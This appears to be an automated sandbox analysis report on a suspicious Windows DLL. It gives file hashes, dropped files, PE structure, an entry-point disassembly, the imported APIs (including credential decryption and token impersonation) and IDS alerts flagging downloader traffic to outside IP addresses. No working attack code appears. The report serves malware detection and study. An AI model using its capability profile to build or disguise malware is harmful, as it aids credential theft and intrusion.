                                                                                                                                                      MD5:99BBE027A67D5B8E84C910F7C77709D2
                                                                                                                                                      SHA1:372EFA7431F8EECFC4247C810131CB6928E50AC3
                                                                                                                                                      SHA-256:0F27051CF1DA3BBA983425A45ED2DE291E43491E0A982844D92C5B92AF34FCAE
                                                                                                                                                      SHA-512:E3970DEFF941FE95016F731651C7C234FF4AD27B54317BE44B4292F050E2A4B9ACACFF103837ADFC94999F9B534098231204C26D9BBDF47412CFE09C50F77BE7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:sdPC......................5.y&.K.?....................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):258
                                                                                                                                                      Entropy (8bit):4.986495414798812
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:qUUcA+HNVtNnk0Nwkn23oH+TcwtfRug9duGjj6qpV+RM0ld2v:vUPoN/+fYebECdJjjZpV2HI
                                                                                                                                                      MD5:944AE6E1869CC91CF9850C426ADDD7FE
                                                                                                                                                      SHA1:54DC795B4663C8DDE9774DD0FCB92AD497CC2509
                                                                                                                                                      SHA-256:368356A41645F28F3936E4EB6E852819C0948AF941E43878151FD721BE5E0421
                                                                                                                                                      SHA-512:4AE9425CC770E22960661B83B7979AC5A5F193BCC97D49C4657C0C0BF043CB74BFC4858D61A1BBC3801B9C0C555B7454D71B3233B95E74DC160ED5D230D1BCD5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[0114/072414.191:ERROR:devtools_http_handler.cc(305)] Error writing DevTools active port to file C:\Users\user\AppData\Local\Microsoft\Edge\User Data\DevToolsActivePort: The process cannot access the file because it is being used by another process. (0x20).
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):59
                                                                                                                                                      Entropy (8bit):4.395378541533799
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:gJvK2ISuyAxZJVO4S3gzB:gJvKX5RzJLS3gzB
                                                                                                                                                      MD5:9D183D47D003CADF1637A0C8AAE51AE1
                                                                                                                                                      SHA1:2A597ABDDA81F46AD8F559757723832B7EDA0837
                                                                                                                                                      SHA-256:FC7B7DF6D5BB807298607E869530A643315103D4941387FE5F9B2E95532F525A
                                                                                                                                                      SHA-512:EC29EEB70997DAC1033FC6C4BE004F2D78F456A47CAB200607A60B48044B3A6EFA73A69EAC8233EACE5481E58CCD1958AF8A1E46470715D4DB4A473CCAAA5886
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:9459./devtools/browser/598b41e2-2f17-4224-a4a1-bf9c73dac9bd
                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):49152
                                                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):49152
                                                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):32768
                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1780736
                                                                                                                                                      Entropy (8bit):6.54388973247121
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:izDLT7eXc2a+xMPDBsvh58j6OQ/K4eSlrIBizB2J4bJGtpxnvUmhEocQ0x58:iTTXkMPDjj6O0d1Z9sxnvU3Z
                                                                                                                                                      MD5:B1A10828FADDCB586CC3A9C7A01CBBBF
                                                                                                                                                      SHA1:1D7EF8581F731D77C9621045C0F2712D654EBEF0
                                                                                                                                                      SHA-256:1D2D090188CD500EB6098701690A72F090440162A651123EAB44132525597446
                                                                                                                                                      SHA-512:12171C09B03BB2E163561B9B7618B3EC8566D3162A2472A63661A1F86F26118272F3A7C6608C09640D57D992DE52A840DEB41B5EB089E19D35E45D08492ACACF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: VRO.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: e0691gXIKs.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: hJ1bl8p7dJ.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: Y4TyDwQzbE.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: DYv2ldz5xT.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: rBFTGm5ioO.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: DYv2ldz5xT.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: rBFTGm5ioO.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: nNnzvybxiy.exe, Detection: malicious, Browse
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N..B.........A......A......A...+..A............X...*..X......X...................N..........Rich...........................PE..d.....Xg.........." .....*................................................................`A.............................................$......(....`.......`..P............p...... _..T............................_..8............@...............................text....(.......*.................. ..`.rdata......@......................@..@.data............n..................@....pdata..P....`......."..............@..@_RDATA.......P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                      Entropy (8bit):4.466383645359538
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:NIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNcdwBCswSb9:eXD94zWlLZMM6YFHa+9
                                                                                                                                                      MD5:05BFD866477820F61BD8F4790093ABBA
                                                                                                                                                      SHA1:F62794C484ABE105D7F8D53561A2349ED99A4750
                                                                                                                                                      SHA-256:FF3DE515EA17C409B0BC10248DE8BD73F87EE26F91013696FE46FF9444653638
                                                                                                                                                      SHA-512:30D0A0261C6B604E9707D783D6019F8A4F5B5A30BACDA16AC199767B83C2554CF951ED0CEB5146B2C72D591E5028B7C47B69D4DF6C4FF273AE487C0F7281FD50
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...:.f..............................................................................................................................................................................................................................................................................................................................................k...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                      Entropy (8bit):6.9215087990179045
                                                                                                                                                      TrID:
                                                                                                                                                      • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                                                                      • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                                                                      • DOS Executable Generic (2002/1) 1.70%
                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                                                                      File name:mP8rzGD7fG.dll
                                                                                                                                                      File size:26'218'512 bytes
                                                                                                                                                      MD5:32893397afbb3b64a7ad72505d57b2a2
                                                                                                                                                      SHA1:8d901669e2e7ed707de6f6b78783bdef94ca347e
                                                                                                                                                      SHA256:ebcb219cffe49e60fccfd0ea6f95feb5166751426e70faafcc328ed1903d6324
                                                                                                                                                      SHA512:0ac5e0c43b5717ffe70eddb5f7987044021282a6b4c6af8138024577c0cd124b46c9d12434100b06c1e30f66970d56a9534964bad92a7ca28be1b0eae0dde242
                                                                                                                                                      SSDEEP:393216:6BECfqcx7kwvzI25doyLhdYzXexvaNoXHjK:a4MxhdYzXexvAoT
                                                                                                                                                      TLSH:AA47AE14A3E80A66E5BB9734C575C232DAB1BD625731D60F254CF2891F73B818B2B732
                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\aYg..74..74..74..45..74..35..74..25?.74.x.4..74j.65..74..64..74..45..74..35..74..74..74..25P.74..75..74..55..74Rich..74.......
                                                                                                                                                      Icon Hash:7ae282899bbab082
                                                                                                                                                      Entrypoint:0x180081be0
                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                      Digitally signed:false
                                                                                                                                                      Imagebase:0x180000000
                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                      Time Stamp:0x677DF847 [Wed Jan 8 04:00:07 2025 UTC]
                                                                                                                                                      TLS Callbacks:
                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                      OS Version Major:6
                                                                                                                                                      OS Version Minor:0
                                                                                                                                                      File Version Major:6
                                                                                                                                                      File Version Minor:0
                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                      Import Hash:4232f3ef80fc72e98eb20eb21622b405
                                                                                                                                                      Instruction
                                                                                                                                                      dec eax
                                                                                                                                                      mov dword ptr [esp+08h], ebx
                                                                                                                                                      dec eax
                                                                                                                                                      mov dword ptr [esp+10h], esi
                                                                                                                                                      push edi
                                                                                                                                                      dec eax
                                                                                                                                                      sub esp, 20h
                                                                                                                                                      dec ecx
                                                                                                                                                      mov edi, eax
                                                                                                                                                      mov ebx, edx
                                                                                                                                                      dec eax
                                                                                                                                                      mov esi, ecx
                                                                                                                                                      cmp edx, 01h
                                                                                                                                                      jne 00007F2EBD490017h
                                                                                                                                                      call 00007F2EBD4909E8h
                                                                                                                                                      dec esp
                                                                                                                                                      mov eax, edi
                                                                                                                                                      mov edx, ebx
                                                                                                                                                      dec eax
                                                                                                                                                      mov ecx, esi
                                                                                                                                                      dec eax
                                                                                                                                                      mov ebx, dword ptr [esp+30h]
                                                                                                                                                      dec eax
                                                                                                                                                      mov esi, dword ptr [esp+38h]
                                                                                                                                                      dec eax
                                                                                                                                                      add esp, 20h
                                                                                                                                                      pop edi
                                                                                                                                                      jmp 00007F2EBD48FEB0h
                                                                                                                                                      int3
                                                                                                                                                      int3
                                                                                                                                                      int3
                                                                                                                                                      jmp 00007F2EBD490C78h
                                                                                                                                                      int3
                                                                                                                                                      int3
                                                                                                                                                      int3
                                                                                                                                                      dec eax
                                                                                                                                                      sub esp, 28h
                                                                                                                                                      call 00007F2EBD490C74h
                                                                                                                                                      jmp 00007F2EBD490014h
                                                                                                                                                      xor eax, eax
                                                                                                                                                      dec eax
                                                                                                                                                      add esp, 28h
                                                                                                                                                      ret
                                                                                                                                                      int3
                                                                                                                                                      int3
                                                                                                                                                      dec eax
                                                                                                                                                      sub esp, 28h
                                                                                                                                                      dec ebp
                                                                                                                                                      mov eax, dword ptr [ecx+38h]
                                                                                                                                                      dec eax
                                                                                                                                                      mov ecx, edx
                                                                                                                                                      dec ecx
                                                                                                                                                      mov edx, ecx
                                                                                                                                                      call 00007F2EBD490022h
                                                                                                                                                      mov eax, 00000001h
                                                                                                                                                      dec eax
                                                                                                                                                      add esp, 28h
                                                                                                                                                      ret
                                                                                                                                                      int3
                                                                                                                                                      int3
                                                                                                                                                      int3
                                                                                                                                                      inc eax
                                                                                                                                                      push ebx
                                                                                                                                                      inc ebp
                                                                                                                                                      mov ebx, dword ptr [eax]
                                                                                                                                                      dec eax
                                                                                                                                                      mov ebx, edx
                                                                                                                                                      inc ecx
                                                                                                                                                      and ebx, FFFFFFF8h
                                                                                                                                                      dec esp
                                                                                                                                                      mov ecx, ecx
                                                                                                                                                      inc ecx
                                                                                                                                                      test byte ptr [eax], 00000004h
                                                                                                                                                      dec esp
                                                                                                                                                      mov edx, ecx
                                                                                                                                                      je 00007F2EBD490025h
                                                                                                                                                      inc ecx
                                                                                                                                                      mov eax, dword ptr [eax+08h]
                                                                                                                                                      dec ebp
                                                                                                                                                      arpl word ptr [eax+04h], dx
                                                                                                                                                      neg eax
                                                                                                                                                      dec esp
                                                                                                                                                      add edx, ecx
                                                                                                                                                      dec eax
                                                                                                                                                      arpl ax, cx
                                                                                                                                                      dec esp
                                                                                                                                                      and edx, ecx
                                                                                                                                                      dec ecx
                                                                                                                                                      arpl bx, ax
                                                                                                                                                      dec edx
                                                                                                                                                      mov edx, dword ptr [eax+edx]
                                                                                                                                                      dec eax
                                                                                                                                                      mov eax, dword ptr [ebx+10h]
                                                                                                                                                      mov ecx, dword ptr [eax+08h]
                                                                                                                                                      dec eax
                                                                                                                                                      mov eax, dword ptr [ebx+08h]
                                                                                                                                                      test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                                                      je 00007F2EBD49001Dh
                                                                                                                                                      movzx eax, byte ptr [ecx+eax+03h]
                                                                                                                                                      and eax, FFFFFFF0h
                                                                                                                                                      Programming Language:
                                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x1bc7b900x68.rdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1bc7bf80x154.rdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1caf0000x398.rsrc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1c0d0000xa1304.pdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1cb00000x1fa8.reloc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x1a761d00x54.rdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x1a764000x28.rdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1a760900x140.rdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xc340000xc70.rdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                      .text0x10000x8f1580x8f200ce60a1f18440c89e81261bbdda780ac5False0.42795271561135373data6.675012123139781IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                      .managed0x910000x82a1780x82a20043b7b130895bb170b8742fbe400c5baaunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                      hydrated0x8bc0000x377f700x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                      .rdata0xc340000xf9660a0xf9680029ef06c5b0df8a96a7210b1ed357f2c8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                      .data0x1bcb0000x419300xd8005ab71544b18948c91cc061c9e150f63dFalse0.2798936631944444data5.16678777217334IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                      .pdata0x1c0d0000xa13040xa1400604077659270464ab488e28625d874c9False0.494069464631783data6.764961587293354IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                      .rsrc0x1caf0000x3980x40065dd2aed131e9bc795f7bdd7d6b7f7f4False0.3837890625data3.0042443737151787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                      .reloc0x1cb00000x1fa80x2000e99f5b31aa97a1a2994404187a137473False0.2191162109375data5.4435770207253515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                      RT_VERSION0x1caf0580x340data0.42427884615384615
                                                                                                                                                      DLLImport
                                                                                                                                                      ADVAPI32.dllRegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegEnumKeyExW, RegEnumValueW, GetTokenInformation, OpenThreadToken, RevertToSelf, ImpersonateLoggedOnUser
                                                                                                                                                      bcrypt.dllBCryptCreateHash, BCryptEncrypt, BCryptDestroyHash, BCryptDestroyKey, BCryptCloseAlgorithmProvider, BCryptSetProperty, BCryptOpenAlgorithmProvider, BCryptImportKeyPair, BCryptImportKey, BCryptHashData, BCryptGetProperty, BCryptFinishHash, BCryptExportKey, BCryptDecrypt, BCryptGenRandom
                                                                                                                                                      CRYPT32.dllCryptProtectData, CryptUnprotectData, CertFreeCertificateChainEngine, CertCloseStore, PFXImportCertStore, PFXExportCertStore, CryptFindOIDInfo, CryptQueryObject, CryptMsgGetParam, CryptMsgClose, CryptImportPublicKeyInfoEx2, CryptFormatObject, CryptDecodeObject, CertVerifyTimeValidity, CertSetCertificateContextProperty, CertSerializeCertificateStoreElement, CertVerifyCertificateChainPolicy, CertFreeCertificateContext, CertEnumCertificatesInStore, CertDuplicateCertificateContext, CertGetCertificateContextProperty, CryptProtectMemory, CryptUnprotectMemory, CertAddCertificateContextToStore, CertAddCertificateLinkToStore, CertControlStore, CertCreateCertificateChainEngine, CertFindCertificateInStore, CertFindExtension, CertFreeCertificateChain, CertGetCertificateChain, CertGetIntendedKeyUsage, CertGetNameStringW, CertGetValidUsages, CertNameToStrW, CertOpenStore, CertSaveStore
                                                                                                                                                      IPHLPAPI.DLLGetAdaptersAddresses, GetPerAdapterInfo, GetNetworkParams, if_nametoindex
                                                                                                                                                      KERNEL32.dllRtlUnwindEx, InterlockedFlushSList, RtlPcToFileHeader, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, IsDebuggerPresent, InitializeSListHead, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, RaiseException, UnhandledExceptionFilter, QueryPerformanceCounter, SetLastError, FormatMessageW, GetLastError, GetCPInfoExW, GetConsoleMode, GetFileType, ReadFile, ReadConsoleW, WriteFile, WriteConsoleW, GetConsoleOutputCP, GetStdHandle, MultiByteToWideChar, WideCharToMultiByte, GetTickCount64, K32EnumProcessModulesEx, CloseHandle, IsWow64Process, GetExitCodeProcess, CreateProcessW, TerminateProcess, OpenProcess, K32EnumProcesses, K32GetModuleInformation, K32GetModuleBaseNameW, K32GetModuleFileNameExW, GetProcessId, DuplicateHandle, QueryFullProcessImageNameW, CreatePipe, GetCurrentProcess, GetConsoleCP, GetLogicalDrives, GetProcAddress, LoadLibraryW, LoadLibraryExW, CancelIoEx, CloseThreadpoolIo, GetCurrentProcessId, RaiseFailFastException, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToSystemTime, GetSystemTime, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, EnumSystemLocalesEx, ResolveLocaleName, LCIDToLocaleName, GetUserPreferredUILanguages, FindStringOrdinal, GetCurrentThread, WaitForSingleObject, Sleep, DeleteCriticalSection, LocalFree, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, InitializeCriticalSection, InitializeConditionVariable, CreateThreadpoolTimer, SetThreadpoolTimer, WaitForMultipleObjectsEx, GetCurrentThreadId, CreateThreadpoolWait, SetThreadpoolWait, WaitForThreadpoolWaitCallbacks, CloseThreadpoolWait, CreateThreadpoolWork, CloseThreadpoolWork, SubmitThreadpoolWork, QueryPerformanceFrequency, GetFullPathNameW, GetLongPathNameW, GetCPInfo, LocalAlloc, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CancelSynchronousIo, CreateIoCompletionPort, CopyFileExW, CreateDirectoryW, CreateFileW, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, DeleteFileW, DeleteVolumeMountPointW, DeviceIoControl, ExpandEnvironmentStringsW, FindNextFileW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetCurrentDirectoryW, GetFileAttributesExW, GetFileInformationByHandleEx, GetModuleFileNameW, GetOverlappedResult, GetSystemDirectoryW, OpenThread, QueryUnbiasedInterruptTime, RemoveDirectoryW, SetFileAttributesW, SetFileInformationByHandle, SetFilePointerEx, SetThreadErrorMode, CreateThread, ResumeThread, GetThreadPriority, SetThreadPriority, GetDynamicTimeZoneInformation, GetTimeZoneInformation, GetCurrentProcessorNumberEx, SetEvent, ResetEvent, CreateEventExW, GetEnvironmentVariableW, SetEnvironmentVariableW, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, SwitchToThread, SuspendThread, GetThreadContext, SetThreadContext, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, VirtualQuery, GetSystemTimeAsFileTime, DebugBreak, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, EncodePointer, DecodePointer, HeapCreate, HeapDestroy, HeapAlloc, HeapFree, GetProcessHeap, RtlLookupFunctionEntry
                                                                                                                                                      ncrypt.dllNCryptImportKey, NCryptOpenKey, NCryptDeleteKey, NCryptOpenStorageProvider, NCryptGetProperty, NCryptSetProperty, NCryptFreeObject
                                                                                                                                                      ole32.dllCoInitializeEx, CoGetObjectContext, CoUninitialize, CoTaskMemFree, CoTaskMemAlloc, CoGetApartmentType, CoGetContextToken, CoCreateGuid, CLSIDFromProgID, CoWaitForMultipleHandles
                                                                                                                                                      OLEAUT32.dllVariantClear, SysAllocStringLen, SysFreeString
                                                                                                                                                      USER32.dllLoadStringW
                                                                                                                                                      WS2_32.dllFreeAddrInfoExW, WSACleanup, WSASend, WSARecv, WSAGetOverlappedResult, WSAEventSelect, shutdown, setsockopt, WSAStartup, send, select, WSAIoctl, bind, GetNameInfoW, getpeername, getsockopt, ioctlsocket, WSAConnect, closesocket, GetAddrInfoExW, GetAddrInfoW, FreeAddrInfoW, WSASocketW, recv
                                                                                                                                                      api-ms-win-crt-heap-l1-1-0.dllcalloc, realloc, _callnewh, malloc, free
                                                                                                                                                      api-ms-win-crt-math-l1-1-0.dlltanf, nan, nanf, fmod, fmodf, atanf, tanh, ceil, cos, exp, floor, log, log10, pow, sin, tan, modf, ceilf, cosf, expf, floorf, logf, powf, sinf, modff, log2, atan2, fma, acosh, asinh, atanh, cosh, sinh, asinf, cbrt, acos, asin, atan, log2f, atan2f, fmaf, acoshf, asinhf, atanhf, coshf, sinhf, tanhf, log10f, cbrtf, acosf
                                                                                                                                                      api-ms-win-crt-string-l1-1-0.dll_stricmp, strcmp, strcpy_s, strncpy_s, wcsncmp
                                                                                                                                                      api-ms-win-crt-convert-l1-1-0.dllstrtoull
                                                                                                                                                      api-ms-win-crt-runtime-l1-1-0.dll_initterm, _initterm_e, _seh_filter_dll, _configure_narrow_argv, _initialize_narrow_environment, _initialize_onexit_table, _register_onexit_function, _execute_onexit_table, _crt_atexit, _cexit, terminate, abort
                                                                                                                                                      api-ms-win-crt-stdio-l1-1-0.dll__acrt_iob_func, __stdio_common_vfprintf, __stdio_common_vsprintf_s, __stdio_common_vsscanf
                                                                                                                                                      NameOrdinalAddress
                                                                                                                                                      AddNumbers10x18064ef20
                                                                                                                                                      DotNetRuntimeDebugHeader20x181bd7860
                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                      2025-01-14T13:25:37.658822+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449933172.65.251.78443TCP
                                                                                                                                                      2025-01-14T13:25:40.466284+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449956104.26.13.205443TCP
                                                                                                                                                      2025-01-14T13:25:41.113485+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449962104.26.13.205443TCP
                                                                                                                                                      2025-01-14T13:25:41.660911+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449964208.95.112.180TCP
                                                                                                                                                      2025-01-14T13:25:42.323249+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449968104.26.13.205443TCP
                                                                                                                                                      2025-01-14T13:25:42.924536+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449972104.26.13.205443TCP
                                                                                                                                                      2025-01-14T13:25:43.392876+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449976208.95.112.180TCP
                                                                                                                                                      2025-01-14T13:26:35.032818+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450069104.26.12.205443TCP
                                                                                                                                                      2025-01-14T13:26:35.646885+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450070104.26.12.205443TCP
                                                                                                                                                      2025-01-14T13:26:36.126253+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450071208.95.112.180TCP
